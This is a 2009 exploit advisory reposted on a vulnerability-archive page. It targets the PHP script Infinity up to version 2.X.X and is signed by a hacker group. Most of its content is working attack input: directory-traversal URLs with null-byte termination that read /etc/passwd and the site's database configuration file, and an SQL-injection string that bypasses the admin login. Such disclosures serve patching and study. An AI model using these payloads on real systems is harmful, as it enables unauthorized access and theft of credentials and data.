Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:22370
HistoryAug 25, 2009 - 12:00 a.m.

Infinity <= v2.X.X (Local File Disclosure/Auth Bypass) Vulnerabilities

2009-08-2500:00:00
vulners.com
22

-----------------Infinity <= v2.X.X (Local File Disclosure/Auth Bypass) Vulnerabilities-------------------------
Script : Infinity
version : 2.X.X
Language: PHP
Site: http://www.dimofinf.net/
Author: SwEET-DeViL

need magic_quotes_gpc = Off <-----(<>


  • +[Local File Disclosure]
    #Exploit:

http://WWW.Site.Com/inf/?options[langfile]=../../../../../../etc/passwd&#37;00

http://WWW.Site.Com/inf/?options[style_dir]=../include/db.php&#37;00

#----------------------------------------------------------------------------------------------------------------

  • +[Auth Bypass]

http://WWW.Site.Com/inf/cp

#Exploit:

username : 'or 1=1/*

password : SwEET-DeViL

#----------------------------------------------------------------------------------------------------------------

/-------------www.arab4services.net-----------------\
|±-----------------------------------------------+ |
|| SwEET-DeViL & viP HaCkEr | |
|| gamr-14(at)hotmail.com | |
|±-----------------------------------------------+ |
\---------------------------------------------------/